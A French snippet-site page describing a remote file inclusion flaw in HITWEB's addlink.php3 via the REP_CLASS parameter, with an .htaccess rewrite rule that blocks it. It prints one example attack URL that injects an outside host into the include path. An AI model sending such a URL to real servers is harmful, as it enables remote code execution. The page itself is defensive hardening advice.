Inclusion de fichiers distants avec un script de HITWEB

Partager sur Facebook Partager sur X Partager sur Reddit Partager sur LinkedIn Partager sur Pinterest

      Information sur le code

Il est possible dans certains cas de faire exécuter du code malveillant avec le script addlink.php3 et un paramètre REP_CLASS.

En effet si le paramètre register_globals est à on, la variable $REP_CLASS est initialisée avec le paramètre GET.

Comme cette variable sert de préfixe au chemin des includes du script addlink.php3 il est facile d'exécuter un script externe sur votre serveur (remote file include).

Les urls sont du type http://www.example.com//addlink.php3?REP_CLASS=http://www.sitepourri.com/page?? Ces deux lignes vous protègent de cette attaque.


avatar

Forty

  31 Mai 2008

  Code Source à télécharger

Information sur les mises à jour

Dernière mise à jour :

18 Août 2019
fonctionnement du code vérifié

6 233  vues
Site internet de l'auteur  
  code classé dans   .HTACCESS ANTI HACK
  code source classé dans   .HTACCESS ANTI HACK
 
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
                    

                    

                    
/*------------------------------*/
/*
 Titre : Inclusion de fichiers distants avec un script de HITWEB                                                          
                                                                                                                          
 Auteur           : Forty                                                                                                 
 Website auteur   : http://www.toplien.fr/                                                                                
 Date édition     : 31 Mai 2008                                                                                        
 Date mise a jour : 18 Aout 2019
                                                                                         
 Rapport de la maj:                                                                                                       
  - fonctionnement du code vérifié                                                                                  
*/
/*------------------------------*/?>
RewriteCond %{QUERY_STRING} ^(.*&)?REP_CLASS=http://
RewriteRule ^(.+/)?addlink.php3 - [F,L]
/*------------------------------*/
/*
Titre : Inclusion de fichiers distants avec un script de HITWEB

Auteur : Forty
Website auteur : http://www.toplien.fr/
Date édition : 31 Mai 2008
Date mise a jour : 18 Aout 2019

Rapport de la maj:
- fonctionnement du code vérifié
*/
/*------------------------------*/?>
RewriteCond %{QUERY_STRING} ^(.*&)?REP_CLASS=http://
RewriteRule ^(.+/)?addlink.php3 - [F,L]

 Autres snippets qui pourraient vous intéresser

22 Sept 2019  

31 Mai 2008 

Téléchargement de fichiers zip avec compteur

Compatibilité : PHP 5, PHP 7, PHP 8

Mettre à disposition sur votre site des fichiers zip à télécharger et compter le nombre de téléchargements effectués.

21 Août 2019  

31 Mai 2008 

En PHP visionneuse d'images sur 4 colonnes

Compatibilité : PHP 5, PHP 7, PHP 8

Visionneuse sur 4 colonnes suppression des images. Possibilité ou non de lister les sous répertoires. Avec option suppression.

* Requêtes exécutées avec Recherche Contextuelle

  Les derniers scripts PHP / MySQL

PmWiki 2.5.9

logo PmWiki
Langue langue fr
Date  aujourd'hui
Taille 0.68 Mo
Catégorie Wiki

CubeCart 6.6.2

logo CubeCart
Langue langue en
Date  hier
Taille 16 Mo
Catégorie Ecommerce

Magepattern 1.1

logo Magepattern
Langue langue fr
Date 15 Avril 2026
Taille 6 Mo
Catégorie CMS

PHP 8.5.5

logo PHP
Langue langue us
Date 12 Avril 2026
Taille 32 Mo
Catégorie PHP

PHP 8.4.20

logo PHP
Langue langue us
Date 12 Avril 2026
Taille 30 Mo
Catégorie PHP

Serendipity 2.6.0

logo Serendipity
Langue langue fr
Date 11 Avril 2026
Taille 15 Mo
Catégorie Blogs
avatar

Forty

  31 Mai 2008

  SOURCE   Télécharger

Information sur les mises à jour

Dernière mise à jour :

18 Août 2019
fonctionnement du code vérifié

6 233 Vues
site internet
Site internet  
26 codes

Catégorie :  .HTACCESS ANTI HACK

Bloquer l'accès au site pour le navigateur libwww-perl
Bloquer le hacking avec le script errors.php
Bloquer les hackers utilisant le script booth.php
Bloquer les proxy appspot.com
Bloquer les requetes de hacker avec %3Cstring%3E
Corriger la faille touchant mambo via image_upload.php
Empêcher le hack via aedatingCMS.php
Empêcher le hack via gestion_sondage.php
Empêcher le hack via mosConfig_absolute_path
Empêcher le hack via sitemap.php
Empeche le hack via wamp_dir/setup/yesno.phtml
Empecher le hack via admin.php
Empecher le hack via admin_smilies.php
Empecher le hack via bbs.lib.inc.php
Empecher le hack via setup/header.php
Empecher les attaques par include de fichier externe
Eviter la faille de sécurité de Joomla (mosDirectory)
Eviter les attaques par le script send_reminders.php
Inclusion de fichiers distants avec un script de HITWEB
Protection contre la faille de sécurité de info.inc.php
Protection contre la faille de sécurité de stats.inc.php
Protection contre le hack avec 404.php
Sécurisation de votre site avec phpbb (phpbb_root_path)
Se protéger du hacking avec admin.php et include_path
Vulnérabilité par inclusion de fichier distant avec smarty.php
Vulnérabilité touchant webcalendar via tools/send_reminders.php

Catégories générales

Applications  [ 11 ]
Banque de données  [ 18 ]
Chaines de caractères  [ 58 ]
Classes  [ 21 ]
Constantes  [ 4 ]
Convertisseurs  [ 12 ]
Cookies  [ 4 ]
Dates - Heures  [ 52 ]
Divers  [ 19 ]
Mail - Emailing  [ 14 ]
Fichiers-répertoires  [ 53 ]
Fonctions  [ 13 ]
Formulaires  [ 13 ]
FTP  [ 16 ]
.HTACCESS  [ 58 ]
.HTACCESS ANTI HACK  [ 26 ]
HTML  [ 13 ]
Images - Graphisme  [ 54 ]
Jeux  [ 3 ]
Mathématiques  [ 46 ]
MySQL  [ 23 ]
MySQLi  [ 19 ]
Navigateurs  [ 5 ]
Page par Page  [ 5 ]
Prestashop  [ 4 ]
Recherches  [ 6 ]
Regex  [ 14 ]
Sécurité  [ 24 ]
SEO - Référencement  [ 13 ]
Sessions  [ 8 ]
SQL Tricks  [ 6 ]
Statistiques  [ 7 ]
Système  [ 12 ]
Tableaux - Array  [ 34 ]
Tag Cloud  [ 4 ]
URL - Liens  [ 25 ]
Variables  [ 9 ]
Vérificateurs  [ 8 ]
Wordpress  [ 8 ]
[ 5 ]
XML  [ 4 ]